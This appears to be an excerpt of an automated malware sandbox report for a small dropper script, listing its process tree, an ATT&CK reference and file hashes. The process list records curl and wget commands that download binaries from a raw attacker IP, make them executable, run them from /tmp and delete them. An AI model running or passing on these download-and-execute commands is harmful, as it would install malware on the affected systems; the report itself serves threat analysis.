  /usr/bin/curl: curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:883) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:884)
  /bin/chmod: chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:885) [File and Directory Permissions Modification]
  /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc: ./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:886) [Executes dropped EXE]
  /bin/rm: rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc (PID:887)
  /usr/bin/wget: wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB (PID:888)
-
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97